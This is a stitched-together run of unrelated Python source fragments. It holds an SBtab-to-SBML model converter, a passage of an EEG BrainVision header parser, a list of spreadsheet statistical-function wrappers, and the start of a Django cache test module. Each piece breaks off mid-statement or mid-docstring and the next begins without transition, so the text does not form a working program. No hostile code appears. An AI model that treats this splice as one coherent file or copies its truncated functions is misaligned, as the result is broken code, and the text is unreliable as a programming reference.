sbtab_types = ['Quantity','Event','Rule']
urns = ["obo.chebi","kegg.compound","kegg.reaction","obo.go","obo.sgd","biomodels.sbo","ec-code","kegg.orthology","uniprot"]
class ConversionError(Exception):
'''
Base class for errors in the SBtab conversion class.
'''
def __init__(self,message):
self.message = message
def __str__(self):
return self.message
class SBtabDocument:
'''
SBtab document to be converted to SBML model
'''
def __init__(self, sbtab, filename, tabs=1):
'''
Initalizes SBtab document, checks it for SBtab count.
If there is more than one SBtab table to be converted, provide a "tabs" parameter higher than 1.
Parameters
----------
sbtab : str
SBtab file as string representation.
filename : str
SBtab file name.
tabs : int
Amount of SBtab tables in the provided file.
'''
self.filename = filename
if self.filename.endswith('tsv') or self.filename.endswith('csv') or self.filename.endswith('.xls'): pass
else: raise ConversionError('The given file format is not supported: %s' % self.filename)
self.document = [sbtab]
self.tabs = tabs
self.unit_mM = False
self.unit_mpdw = False
self.checkTabs() #check how many SBtabs are given in the document
def checkTabs(self):
'''
Checks how many SBtab files are given by the user and saves them
in a list; moreover, it stores the SBtab types in a dict linking to the SBtabs.
'''
self.type2sbtab = {}
#if there are more than one SBtabs given in single files that might be comprised of several SBtabs:
if self.tabs > 1:
for single_document in self.document[0]:
#check for several SBtabs in one document
document_rows = single_document.split('\n')
tabs_in_document = self.getAmountOfTables(document_rows)
if tabs_in_document > 1:
sbtabs = self.splitDocumentInTables(document_rows)
else: sbtabs = [document_rows]
#generate SBtab class instance for every SBtab
for sbtab in sbtabs:
sbtabtsv = self.unifySBtab(sbtab)
if sbtabtsv == False: continue
new_tablib_obj = tablibIO.importSetNew(sbtabtsv,self.filename,separator='\t')
single_tab = SBtab.SBtabTable(new_tablib_obj,self.filename)
if single_tab.table_type in self.type2sbtab.keys():
fn = random_number = str(random.randint(0,1000))
self.type2sbtab[single_tab.table_type+'_'+fn] = single_tab
else: self.type2sbtab[single_tab.table_type] = single_tab
#elif there is only one document given, possibly consisting of several SBtabs
else:
#check for several SBtabs in one document
document_rows = self.document[0].split('\n')
tabs_in_document = self.getAmountOfTables(document_rows)
if tabs_in_document > 1: sbtabs = self.splitDocumentInTables(document_rows)
else: sbtabs = [document_rows]
#generate SBtab class instance for every SBtab
for sbtab in sbtabs:
as_sbtab = '\n'.join(sbtab)
single_tab = SBtab.SBtabTable(as_sbtab, self.filename)
self.type2sbtab[single_tab.table_type] = single_tab
def unifySBtab(self,sbtab):
'''
If we have a list of heterogeneous SBtab files, we have to unify them to one common delimiter; we choose \t arbitrarily.
Parameters
----------
sbtab : str
SBtab file as string representation.
'''
new_tab = []
for row in sbtab:
if row.startswith('!!'): continue
if row.startswith('!'):
columns = row
if '\t' in columns:
delimiter = '\t'
new_tab.append(sbtab[0])
new_tab.append(sbtab[1])
continue
elif ';' in columns:
delimiter = ';'
new_tab.append(sbtab[0].replace(delimiter,'\t'))
new_tab.append(sbtab[1].replace(delimiter,'\t'))
continue
elif ',' in columns:
delimiter = ','
new_tab.append(sbtab[0].replace(delimiter,'\t'))
new_tab.append(sbtab[1].replace(delimiter,'\t'))
continue
else:
print('The delimiter of one of the SBtabs could not be identified. Please check.')
else:
try: new_tab.append(row.replace(delimiter,'\t'))
except: return False
new_tab = '\n'.join(new_tab)
return new_tab
def getAmountOfTables(self,document_rows):
'''
Counts the SBtab tables that are present in the document.
Parameters
----------
document_rows : str
Whole SBtab document as a string representation.
'''
counter = 0
for row in document_rows:
if row.startswith('!!'):
counter += 1
return counter
def splitDocumentInTables(self,document_rows):
'''
If the document contains more than one SBtab, this function splits the document into the single SBtabs.
Parameters
----------
document_rows : str
Whole SBtab document as a string representation.
'''
single_sbtab = [document_rows[0]]
sbtab_list = []
for row in document_rows[1:]:
if row.split('\t')[0] == '':
continue
if not row.startswith('!!'):
single_sbtab.append(row)
else:
sbtab_list.append(single_sbtab)
single_sbtab = [row]
sbtab_list.append(single_sbtab)
return sbtab_list
def makeSBML(self):
'''
Generates the SBML file using the provided SBtab file/s.
'''
# initialize new model
self.warnings = []
self.new_document = libsbml.SBMLDocument()
self.new_model = self.new_document.createModel()
self.new_model.setId('default_id')
self.new_model.setName('default_name')
self.new_document.setLevelAndVersion(2,4)
self.reaction_list = []
self.species_list = []
self.compartment_list = []
self.modifier_list = []
self.id2sbmlid = {}
strikes = 1
valid = True
newSBML = False
while valid:
#0st order: create compartments
try: self.checkForCompartments()
except:
self.warnings.append('Error: The compartment initialisation crashed. Please check for valid compartment information.')
break
#1st order of bizness: due to the right modeling order of SBML, we first check for a compound SBtab
if 'Compound' in self.type2sbtab.keys():
try: self.compoundSBtab()
except:
self.warnings.append('Warning: The provided compounds could not be initialised. Please check for valid compound information.')
else: strikes += 1
#2nd order of bizness: Work the Reaction SBtab (mandatory)
if 'Reaction' in self.type2sbtab.keys():
try:
self.reactionSBtab()
except:
self.warnings.append('Error: The provided reaction information could not be converted. Please check for valid reaction information.')
break
else: strikes += 1
#3rd order: check, which other SBtabs are given
for sbtab in sbtab_types:
try:
self.type2sbtab[sbtab]
name = 'self.'+sbtab.lower()+'SBtab()'
eval(name)
except:
pass
#Last, but not least: generate the SBML model
#libsbml.writeSBML(self.new_document,'New_Model.xml')
newSBML = libsbml.writeSBMLToString(self.new_document)
break
if strikes < 3: return newSBML,self.warnings
else: return False,['There was no or not sufficient model information available to build an SBML model.']
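# Typical end-to-end call (a sketch; the SBtab string and file name are
# placeholders):
#
#   doc = SBtabDocument(sbtab_string, 'reactions.tsv', tabs=1)
#   sbml_string, warnings = doc.makeSBML()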
def getWarningOnly(self):
'''
Returns warnings from the SBML conversion.
'''
return self.warnings
def checkForCompartments(self):
'''
If there is no Compartment SBtab AND no compartments given in the other provided SBtab files, a default
compartment needs to be set.
'''
self.def_comp_set = False #has a default compartment been set?
#1. check for compartment SBtab
try:
self.compartmentSBtab()
return True
except:
pass
#2. if there was no compartment SBtab given, check whether it is given in the other SBtabs
try:
sbtab = self.type2sbtab['Reaction']
sbtab.columns_dict['!Location']
for row in sbtab.value_rows:
if row[sbtab.columns_dict['!Location']] != '':
return True
except:
pass
#3. No compartment yet? Try the Compound SBtab (if present)
try:
sbtab = self.type2sbtab['Compound']
sbtab.columns_dict['!Location']
for row in sbtab.value_rows:
if row[sbtab.columns_dict['!Location']] != '':
return True
except:
pass
#4. Nothing yet? Then create a default compartment
self.def_comp_set = True
default_compartment = self.new_model.createCompartment()
default_compartment.setId('Default_Compartment')
default_compartment.setName('Default_Compartment')
default_compartment.setSize(1)
self.compartment_list.append('Default_Compartment')
return True
def setAnnotation(self,element,annotation,urn,elementtype):
'''
Sets an annotation for a given SBML element.
Parameters
----------
element : libsbml object
Element that needs to be annotated.
annotation : str
The identifier part of the annotation string.
urn : str
URN that links to the external web resource.
elementtype : str
What kind of element needs to be annotated? Model or Biological?
'''
element.setMetaId(element.getId()+"_meta")
cv_term = libsbml.CVTerm()
if elementtype == 'Model':
cv_term.setQualifierType(0)
cv_term.setModelQualifierType(libsbml.BQB_IS)
else:
cv_term.setQualifierType(1)
cv_term.setBiologicalQualifierType(libsbml.BQB_IS)
resource_term = "http://identifiers.org/"+urn+'/'+annotation
cv_term.addResource(resource_term)
return cv_term
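# Usage sketch mirroring the calls elsewhere in this class (the ChEBI identifier
# is a made-up example value):
#
#   cv_term = self.setAnnotation(species, 'CHEBI:17234', 'obo.chebi', 'Biological')
#   species.addCVTerm(cv_term)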
def compartmentSBtab(self):
'''
Extracts the information from the Compartment SBtab and writes it to the model.
'''
sbtab = self.type2sbtab['Compartment']
comp2size = {}
#complement the missing compartments
for row in sbtab.value_rows:
if row[sbtab.columns_dict['!ID']] not in self.compartment_list:
compartment = self.new_model.createCompartment()
if '!Location:SBML:compartment:id' in sbtab.columns and row[sbtab.columns_dict['!Location:SBML:compartment:id']] != '':
compartment.setId(str(row[sbtab.columns_dict['!Location:SBML:compartment:id']]))
else:
compartment.setId(str(row[sbtab.columns_dict['!ID']]))
if '!Name' in sbtab.columns and row[sbtab.columns_dict['!Name']] != '':
compartment.setName(str(row[sbtab.columns_dict['!Name']]))
else:
compartment.setName(str(row[sbtab.columns_dict['!Compartment']]))
#if '!Name' in sbtab.columns and not row[sbtab.columns_dict['!Name']] == '' and not str(row[sbtab.columns_dict['!Name']]).startswith('No Name'):
# #if '|' in row[sbtab.columns_dict['!Name']]: compartment.setName(str(row[sbtab.columns_dict['!Name']].split('|')[0]))
# compartment.setName(str(row[sbtab.columns_dict['!Name']]))
#else:
self.compartment_list.append(row[sbtab.columns_dict['!ID']])
#set the compartment sizes if given
if '!Size' in sbtab.columns:
for comp in self.new_model.getListOfCompartments():
for compsbtab in sbtab.value_rows:
if comp.getId() == compsbtab[sbtab.columns_dict['!ID']] and compsbtab[sbtab.columns_dict['!Size']] != '':
comp.setSize(float(compsbtab[sbtab.columns_dict['!Size']]))
if '!SBOTerm' in sbtab.columns and row[sbtab.columns_dict['!SBOTerm']] != '':
try: compartment.setSBOTerm(int(row[sbtab.columns_dict['!SBOTerm']][4:]))
except: pass
for column in sbtab.columns_dict.keys():
if "Identifiers" in column:
annot = row[sbtab.columns_dict[column]]
if annot == '':
continue
for pattern in urns:
if pattern in column:
urn = pattern
try:
cv_term = self.setAnnotation(compartment,annot,urn,'Model')
compartment.addCVTerm(cv_term)
except:
print('There was an annotation that I could not assign properly: ',compartment.getId(),annot)
def compoundSBtab(self):
'''
Extracts the information from the Compound SBtab and writes it to the model.
'''
sbtab = self.type2sbtab['Compound']
for row in sbtab.value_rows:
if not row[sbtab.columns_dict['!ID']] in self.species_list:
species = self.new_model.createSpecies()
if '!Compound:SBML:species:id' in sbtab.columns and row[sbtab.columns_dict['!Compound:SBML:species:id']] != '':
species.setId(str(row[sbtab.columns_dict['!Compound:SBML:species:id']]))
self.id2sbmlid[row[sbtab.columns_dict['!ID']]] = row[sbtab.columns_dict['!Compound:SBML:species:id']]
else:
species.setId(str(row[sbtab.columns_dict['!ID']]))
self.id2sbmlid[row[sbtab.columns_dict['!ID']]] = None
if '!Name' in sbtab.columns and not row[sbtab.columns_dict['!Name']] == '':
if '|' in row[sbtab.columns_dict['!Name']]: species.setName(str(row[sbtab.columns_dict['!Name']].split('|')[0]))
else: species.setName(str(row[sbtab.columns_dict['!Name']]))
self.species_list.append(species.getId())
#check out the speciestype if possible
if '!SBML:speciestype:id' in sbtab.columns and row[sbtab.columns_dict['!SBML:speciestype:id']] != '':
species_type = self.new_model.createSpeciesType()
species_type.setId(str(row[sbtab.columns_dict['!SBML:speciestype:id']]))
species.setSpeciesType(row[sbtab.columns_dict['!SBML:speciestype:id']])
#if compartments are given, add them
if '!Location' in sbtab.columns and row[sbtab.columns_dict['!Location']] != '':
if not row[sbtab.columns_dict['!Location']] in self.compartment_list:
new_comp = self.new_model.createCompartment()
new_comp.setId(str(row[sbtab.columns_dict['!Location']]))
self.compartment_list.append(row[sbtab.columns_dict['!Location']])
species.setCompartment(row[sbtab.columns_dict['!Location']])
elif self.def_comp_set:
species.setCompartment('Default_Compartment')
if '!InitialConcentration' in sbtab.columns and row[sbtab.columns_dict['!InitialConcentration']] != '':
species.setInitialConcentration(float(row[sbtab.columns_dict['!InitialConcentration']]))
elif '!InitialValue' in sbtab.columns and row[sbtab.columns_dict['!InitialValue']] != '':
| |
misc : list or tuple of str | ints | 'auto'
Names of channels or list of indices that should be designated
MISC channels. Values should correspond to the electrodes
in the vhdr file. If 'auto', units in vhdr file are used for inferring
misc channels. Default is ``'auto'``.
scale : float
The scaling factor for EEG data. Unless specified otherwise by
header file, units are in microvolts. Default scale factor is 1.
montage : str | True | None | instance of Montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0). See the documentation of
:func:`mne.channels.read_montage` for more information.
Returns
-------
info : Info
The measurement info.
fmt : str
The data format in the file.
edf_info : dict
A dict containing Brain Vision specific parameters.
events : array, shape (n_events, 3)
Events from the corresponding vmrk file.
"""
scale = float(scale)
ext = os.path.splitext(vhdr_fname)[-1]
if ext != '.vhdr':
raise IOError("The header file must be given to read the data, "
"not the '%s' file." % ext)
with open(vhdr_fname, 'rb') as f:
# extract the first section to resemble a cfg
header = f.readline()
codepage = 'utf-8'
# we don't actually need to know the coding for the header line.
# the characters in it all belong to ASCII and are thus the
# same in Latin-1 and UTF-8
header = header.decode('ascii', 'ignore').strip()
_check_hdr_version(header)
settings = f.read()
try:
# if there is an explicit codepage set, use it
# we pretend like it's ascii when searching for the codepage
cp_setting = re.search('Codepage=(.+)',
settings.decode('ascii', 'ignore'),
re.IGNORECASE & re.MULTILINE)
if cp_setting:
codepage = cp_setting.group(1).strip()
settings = settings.decode(codepage)
except UnicodeDecodeError:
# if UTF-8 (new standard) or explicit codepage setting fails,
# fallback to Latin-1, which is Windows default and implicit
# standard in older recordings
settings = settings.decode('latin-1')
if settings.find('[Comment]') != -1:
params, settings = settings.split('[Comment]')
else:
params, settings = settings, ''
cfg = configparser.ConfigParser()
if hasattr(cfg, 'read_file'): # newer API
cfg.read_file(StringIO(params))
else:
cfg.readfp(StringIO(params))
# get sampling info
# Sampling interval is given in microsec
sfreq = 1e6 / cfg.getfloat('Common Infos', 'SamplingInterval')
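# e.g. SamplingInterval = 2000 (microseconds) gives sfreq = 1e6 / 2000 = 500 Hz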
info = _empty_info(sfreq)
# check binary format
assert cfg.get('Common Infos', 'DataFormat') == 'BINARY'
order = cfg.get('Common Infos', 'DataOrientation')
if order not in _orientation_dict:
raise NotImplementedError('Data Orientation %s is not supported'
% order)
order = _orientation_dict[order]
fmt = cfg.get('Binary Infos', 'BinaryFormat')
if fmt not in _fmt_dict:
raise NotImplementedError('Datatype %s is not supported' % fmt)
fmt = _fmt_dict[fmt]
# load channel labels
nchan = cfg.getint('Common Infos', 'NumberOfChannels') + 1
ch_names = [''] * nchan
cals = np.empty(nchan)
ranges = np.empty(nchan)
cals.fill(np.nan)
ch_dict = dict()
misc_chs = dict()
for chan, props in cfg.items('Channel Infos'):
n = int(re.findall(r'ch(\d+)', chan)[0]) - 1
props = props.split(',')
# default to microvolts because that's what the older brainvision
# standard explicitly assumed; the unit is only allowed to be
# something else if explicitly stated (cf. EEGLAB export below)
if len(props) < 4:
props += (u'µV',)
name, _, resolution, unit = props[:4]
ch_dict[chan] = name
ch_names[n] = name
if resolution == "":
if not(unit): # For truncated vhdrs (e.g. EEGLAB export)
resolution = 0.000001
else:
resolution = 1. # for files with units specified, but not res
unit = unit.replace(u'\xc2', u'') # Remove unwanted control characters
cals[n] = float(resolution)
ranges[n] = _unit_dict.get(unit, 1) * scale
if unit not in ('V', u'µV', 'uV'):
misc_chs[name] = (FIFF.FIFF_UNIT_CEL if unit == 'C'
else FIFF.FIFF_UNIT_NONE)
misc = list(misc_chs.keys()) if misc == 'auto' else misc
# create montage
if montage is True:
from ...transforms import _sphere_to_cartesian
from ...channels.montage import Montage
montage_pos = list()
montage_names = list()
for ch in cfg.items('Coordinates'):
montage_names.append(ch_dict[ch[0]])
radius, theta, phi = map(float, ch[1].split(','))
# 1: radius, 2: theta, 3: phi
pos = _sphere_to_cartesian(r=radius, theta=theta, phi=phi)
montage_pos.append(pos)
montage_sel = np.arange(len(montage_pos))
montage = Montage(montage_pos, montage_names, 'Brainvision',
montage_sel)
ch_names[-1] = 'STI 014'
cals[-1] = 1.
ranges[-1] = 1.
if np.isnan(cals).any():
raise RuntimeError('Missing channel units')
# Attempts to extract filtering info from header. If not found, both are
# set to zero.
settings = settings.splitlines()
idx = None
if 'Channels' in settings:
idx = settings.index('Channels')
settings = settings[idx + 1:]
hp_col, lp_col = 4, 5
for idx, setting in enumerate(settings):
if re.match('#\s+Name', setting):
break
else:
idx = None
# If software filters are active, then they override the hardware setup
# But we still want to be able to double check the channel names
# for alignment purposes, we keep track of the hardware setting idx
idx_amp = idx
if 'S o f t w a r e F i l t e r s' in settings:
idx = settings.index('S o f t w a r e F i l t e r s')
for idx, setting in enumerate(settings[idx + 1:], idx + 1):
if re.match('#\s+Low Cutoff', setting):
hp_col, lp_col = 1, 2
warn('Online software filter detected. Using software '
'filter settings and ignoring hardware values')
break
else:
idx = idx_amp
if idx:
lowpass = []
highpass = []
# extract filter units and convert s to Hz if necessary
# this cannot be done as post-processing as the inverse t-f
# relationship means that the min/max comparisons don't make sense
# unless we know the units
header = re.split('\s\s+', settings[idx])
hp_s = '[s]' in header[hp_col]
lp_s = '[s]' in header[lp_col]
for i, ch in enumerate(ch_names[:-1], 1):
line = re.split('\s\s+', settings[idx + i])
# double check alignment with channel by using the hw settings
# the actual divider is multiple spaces -- for newer BV
# files, the unit is specified for every channel separated
# by a single space, while for older files, the unit is
# specified in the column headers
if idx == idx_amp:
line_amp = line
else:
line_amp = re.split('\s\s+', settings[idx_amp + i])
assert ch in line_amp
highpass.append(line[hp_col])
lowpass.append(line[lp_col])
if len(highpass) == 0:
pass
elif len(set(highpass)) == 1:
if highpass[0] in ('NaN', 'Off'):
pass # Placeholder for future use. Highpass set in _empty_info
elif highpass[0] == 'DC':
info['highpass'] = 0.
else:
info['highpass'] = float(highpass[0])
if hp_s:
info['highpass'] = 1. / info['highpass']
else:
heterogeneous_hp_filter = True
if hp_s:
# We convert channels with disabled filters to having
# highpass relaxed / no filters
highpass = [float(filt) if filt not in ('NaN', 'Off', 'DC')
else np.Inf for filt in highpass]
info['highpass'] = np.max(np.array(highpass, dtype=np.float))
# Conveniently enough 1 / np.Inf = 0.0, so this works for
# DC / no highpass filter
info['highpass'] = 1. / info['highpass']
# not exactly the cleanest use of FP, but this makes us
# more conservative in *not* warning.
if info['highpass'] == 0.0 and len(set(highpass)) == 1:
# not actually heterogeneous in effect
# ... just heterogeneously disabled
heterogeneous_hp_filter = False
else:
highpass = [float(filt) if filt not in ('NaN', 'Off', 'DC')
else 0.0 for filt in highpass]
info['highpass'] = np.min(np.array(highpass, dtype=np.float))
if info['highpass'] == 0.0 and len(set(highpass)) == 1:
# not actually heterogeneous in effect
# ... just heterogeneously disabled
heterogeneous_hp_filter = False
if heterogeneous_hp_filter:
warn('Channels contain different highpass filters. '
'Lowest (weakest) filter setting (%0.2f Hz) '
'will be stored.' % info['highpass'])
if len(lowpass) == 0:
pass
elif len(set(lowpass)) == 1:
if lowpass[0] in ('NaN', 'Off'):
pass # Placeholder for future use. Lowpass set in _empty_info
else:
info['lowpass'] = float(lowpass[0])
if lp_s:
info['lowpass'] = 1. / info['lowpass']
else:
heterogeneous_lp_filter = True
if lp_s:
# We convert channels with disabled filters to having
# infinitely relaxed / no filters
lowpass = [float(filt) if filt not in ('NaN', 'Off')
else 0.0 for filt in lowpass]
info['lowpass'] = np.min(np.array(lowpass, dtype=np.float))
try:
info['lowpass'] = 1. / info['lowpass']
except ZeroDivisionError:
if len(set(lowpass)) == 1:
# No lowpass actually set for the weakest setting
# so we set lowpass to the Nyquist frequency
info['lowpass'] = info['sfreq'] / 2.
# not actually heterogeneous in effect
# ... just heterogeneously disabled
heterogeneous_lp_filter = False
else:
# no lowpass filter is the weakest filter
HYPGEOMDIST"
return Function("HYPGEOM_DIST", args)
def HYPGEOMDIST(*args) -> Function:
"""
Calculates the probability of drawing a certain number of successes in a certain
number of tries given a population of a certain size containing a certain number
of successes, without replacement of draws.
Learn more: https://support.google.com/docs/answer/3094004
"""
return Function("HYPGEOMDIST", args)
def INTERCEPT(*args) -> Function:
"""
Calculates the y-value at which the line resulting from linear regression of a
dataset will intersect the y-axis (x=0).
Learn more: https://support.google.com/docs/answer/3093632
"""
return Function("INTERCEPT", args)
def KURT(*args) -> Function:
"""
Calculates the kurtosis of a dataset, which describes the shape, and in
particular the "peakedness" of that dataset.
Learn more: https://support.google.com/docs/answer/3093634
"""
return Function("KURT", args)
def LARGE(*args) -> Function:
"""
Returns the nth largest element from a data set, where n is user-defined.
Learn more: https://support.google.com/docs/answer/3094008
"""
return Function("LARGE", args)
def LOGINV(*args) -> Function:
"""
Returns the value of the inverse log-normal cumulative distribution with given
mean and standard deviation at a specified value.
Learn more: https://support.google.com/docs/answer/3094010
"""
return Function("LOGINV", args)
def LOGNORM_DIST(*args) -> Function:
"See LOGNORMDIST"
return Function("LOGNORM_DIST", args)
def LOGNORM_INV(*args) -> Function:
"See LOGINV"
return Function("LOGNORM_INV", args)
def LOGNORMDIST(*args) -> Function:
"""
Returns the value of the log-normal cumulative distribution with given mean and
standard deviation at a specified value.
Learn more: https://support.google.com/docs/answer/3094011
"""
return Function("LOGNORMDIST", args)
def MAX(*args) -> Function:
"""
Returns the maximum value in a numeric dataset.
Learn more: https://support.google.com/docs/answer/3094013
"""
return Function("MAX", args)
def MAXA(*args) -> Function:
"""
Returns the maximum numeric value in a dataset.
Learn more: https://support.google.com/docs/answer/3094016
"""
return Function("MAXA", args)
def MAXIFS(*args) -> Function:
"""
Returns the maximum value in a range of cells, filtered by a set of criteria.
Learn more: https://support.google.com/docs/answer/7013817
"""
return Function("MAXIFS", args)
def MEDIAN(*args) -> Function:
"""
Returns the median value in a numeric dataset.
Learn more: https://support.google.com/docs/answer/3094025
"""
return Function("MEDIAN", args)
def MIN(*args) -> Function:
"""
Returns the minimum value in a numeric dataset.
Learn more: https://support.google.com/docs/answer/3094017
"""
return Function("MIN", args)
def MINA(*args) -> Function:
"""
Returns the minimum numeric value in a dataset.
Learn more: https://support.google.com/docs/answer/3094018
"""
return Function("MINA", args)
def MINIFS(*args) -> Function:
"""
Returns the minimum value in a range of cells, filtered by a set of criteria.
Learn more: https://support.google.com/docs/answer/7014063
"""
return Function("MINIFS", args)
def MODE(*args) -> Function:
"""
Returns the most commonly occurring value in a dataset.
    Learn more: https://support.google.com/docs/answer/3094029
"""
return Function("MODE", args)
def MODE_MULT(*args) -> Function:
"""
Returns the most commonly occurring values in a dataset.
    Learn more: https://support.google.com/docs/answer/9368267.
"""
return Function("MODE_MULT", args)
def MODE_SNGL(*args) -> Function:
"See MODE"
return Function("MODE_SNGL", args)
def NEGBINOM_DIST(*args) -> Function:
"See NEGBINOMDIST"
return Function("NEGBINOM_DIST", args)
def NEGBINOMDIST(*args) -> Function:
"""
Calculates the probability of drawing a certain number of failures before a
certain number of successes given a probability of success in independent
trials.
    Learn more: https://support.google.com/docs/answer/3094031
"""
return Function("NEGBINOMDIST", args)
def NORM_DIST(*args) -> Function:
"See NORMDIST"
return Function("NORM_DIST", args)
def NORM_INV(*args) -> Function:
"See NORMINV"
return Function("NORM_INV", args)
def NORM_S_DIST(*args) -> Function:
"See NORMSDIST"
return Function("NORM_S_DIST", args)
def NORM_S_INV(*args) -> Function:
"See NORMSINV"
return Function("NORM_S_INV", args)
def NORMDIST(*args) -> Function:
"""
Returns the value of the normal distribution function (or normal cumulative
distribution function) for a specified value, mean, and standard deviation.
    Learn more: https://support.google.com/docs/answer/3094021
"""
return Function("NORMDIST", args)
def NORMINV(*args) -> Function:
"""
Returns the value of the inverse normal distribution function for a specified
value, mean, and standard deviation.
    Learn more: https://support.google.com/docs/answer/3094022
"""
return Function("NORMINV", args)
def NORMSDIST(*args) -> Function:
"""
Returns the value of the standard normal cumulative distribution function for a
specified value.
    Learn more: https://support.google.com/docs/answer/3094089
"""
return Function("NORMSDIST", args)
def NORMSINV(*args) -> Function:
"""
Returns the value of the inverse standard normal distribution function for a
specified value.
    Learn more: https://support.google.com/docs/answer/3094091
"""
return Function("NORMSINV", args)
def PEARSON(*args) -> Function:
"""
Calculates r, the Pearson product-moment correlation coefficient of a dataset.
    Learn more: https://support.google.com/docs/answer/3094092
"""
return Function("PEARSON", args)
def PERCENTILE(*args) -> Function:
"""
Returns the value at a given percentile of a dataset.
    Learn more: https://support.google.com/docs/answer/3094093
"""
return Function("PERCENTILE", args)
def PERCENTILE_EXC(*args) -> Function:
"""
Returns the value at a given percentile of a dataset, exclusive of 0 and 1.
    Learn more: https://support.google.com/docs/answer/9368167.
"""
return Function("PERCENTILE_EXC", args)
def PERCENTILE_INC(*args) -> Function:
"See PERCENTILE"
return Function("PERCENTILE_INC", args)
def PERCENTRANK(*args) -> Function:
"""
Returns the percentage rank (percentile) of a specified value in a dataset.
    Learn more: https://support.google.com/docs/answer/3094095
"""
return Function("PERCENTRANK", args)
def PERCENTRANK_EXC(*args) -> Function:
"""
Returns the percentage rank (percentile) from 0 to 1 exclusive of a specified
value in a dataset.
    Learn more: https://support.google.com/docs/answer/3267357
"""
return Function("PERCENTRANK_EXC", args)
def PERCENTRANK_INC(*args) -> Function:
"""
Returns the percentage rank (percentile) from 0 to 1 inclusive of a specified
value in a dataset.
    Learn more: https://support.google.com/docs/answer/3267360
"""
return Function("PERCENTRANK_INC", args)
def PERMUTATIONA(*args) -> Function:
"""
Returns the number of permutations for selecting a group of objects (with
replacement) from a total number of objects.
    Learn more: https://support.google.com/docs/answer/9368324.
"""
return Function("PERMUTATIONA", args)
def PERMUT(*args) -> Function:
"""
Returns the number of ways to choose some number of objects from a pool of a
given size of objects, considering order.
    Learn more: https://support.google.com/docs/answer/3094036
"""
return Function("PERMUT", args)
def PHI(*args) -> Function:
"""
The PHI function returns the value of the normal distribution with mean 0 and
standard deviation 1.
    Learn more: https://support.google.com/docs/answer/9116365.
"""
return Function("PHI", args)
def POISSON(*args) -> Function:
"See POISSON.DIST"
return Function("POISSON", args)
def POISSON_DIST(*args) -> Function:
"""
Returns the value of the Poisson distribution function (or Poisson cumulative
distribution function) for a specified value and mean.
    Learn more: https://support.google.com/docs/answer/3094097.
"""
return Function("POISSON_DIST", args)
def PROB(*args) -> Function:
"""
Given a set of values and corresponding probabilities, calculates the
probability that a value chosen at random falls between two limits.
    Learn more: https://support.google.com/docs/answer/3094039
"""
return Function("PROB", args)
def QUARTILE(*args) -> Function:
"""
Returns a value nearest to a specified quartile of a dataset.
    Learn more: https://support.google.com/docs/answer/3094041
"""
return Function("QUARTILE", args)
def QUARTILE_EXC(*args) -> Function:
"""
Returns value nearest to a given quartile of a dataset, exclusive of 0 and 4.
    Learn more: https://support.google.com/docs/answer/9368240.
"""
return Function("QUARTILE_EXC", args)
def QUARTILE_INC(*args) -> Function:
"See QUARTILE"
return Function("QUARTILE_INC", args)
def RANK(*args) -> Function:
"""
Returns the rank of a specified value in a dataset.
    Learn more: https://support.google.com/docs/answer/3094098
"""
return Function("RANK", args)
def RANK_AVG(*args) -> Function:
"""
Returns the rank of a specified value in a dataset. If there is more than one
entry of the same value in the dataset, the average rank of the entries will be
returned.
    Learn more: https://support.google.com/docs/answer/3267309
"""
return Function("RANK_AVG", args)
def RANK_EQ(*args) -> Function:
"""
Returns the rank of a specified value in a dataset. If there is more than one
entry of the same value in the dataset, the top rank of the entries will be
returned.
    Learn more: https://support.google.com/docs/answer/3267310
"""
return Function("RANK_EQ", args)
def RSQ(*args) -> Function:
"""
Calculates the square of r, the Pearson product-moment correlation coefficient
of a dataset.
    Learn more: https://support.google.com/docs/answer/3094099
"""
return Function("RSQ", args)
def SKEW(*args) -> Function:
"""
Calculates the skewness of a dataset, which describes the symmetry of that
dataset about the mean.
    Learn more: https://support.google.com/docs/answer/3094101
"""
return Function("SKEW", args)
def SKEW_P(*args) -> Function:
"""
Calculates the skewness of a dataset that represents the entire population.
    Learn more: https://support.google.com/docs/answer/9368569.
"""
return Function("SKEW_P", args)
def SLOPE(*args) -> Function:
"""
Calculates the slope of the line resulting from linear regression of a dataset.
    Learn more: https://support.google.com/docs/answer/3094048
"""
return Function("SLOPE", args)
def SMALL(*args) -> Function:
"""
Returns the nth smallest element from a data set, where n is user-defined.
    Learn more: https://support.google.com/docs/answer/3094050
"""
return Function("SMALL", args)
def STANDARDIZE(*args) -> Function:
"""
Calculates the normalized equivalent of a random variable given mean and
standard deviation of the distribution.
    Learn more: https://support.google.com/docs/answer/3094102
"""
return Function("STANDARDIZE", args)
def STDEV(*args) -> Function:
"""
Calculates the standard deviation based on a sample.
    Learn more: https://support.google.com/docs/answer/3094054
"""
return Function("STDEV", args)
def STDEV_P(*args) -> Function:
"See STDEVP"
return Function("STDEV_P", args)
def STDEV_S(*args) -> Function:
"See STDEV"
return Function("STDEV_S", args)
def STDEVA(*args) -> Function:
"""
Calculates the standard deviation based on a sample, setting text to the value
`0`.
    Learn more: https://support.google.com/docs/answer/3094055
"""
return Function("STDEVA", args)
def STDEVP(*args) -> Function:
"""
    Calculates the standard deviation based on an entire population.
    """
    return Function("STDEVP", args)
# File: tests/cache/tests.py
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import copy
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import connection, connections
from django.http import HttpRequest, HttpResponse, StreamingHttpResponse
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase, mock,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import six, timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control,
patch_response_headers, patch_vary_headers,
)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
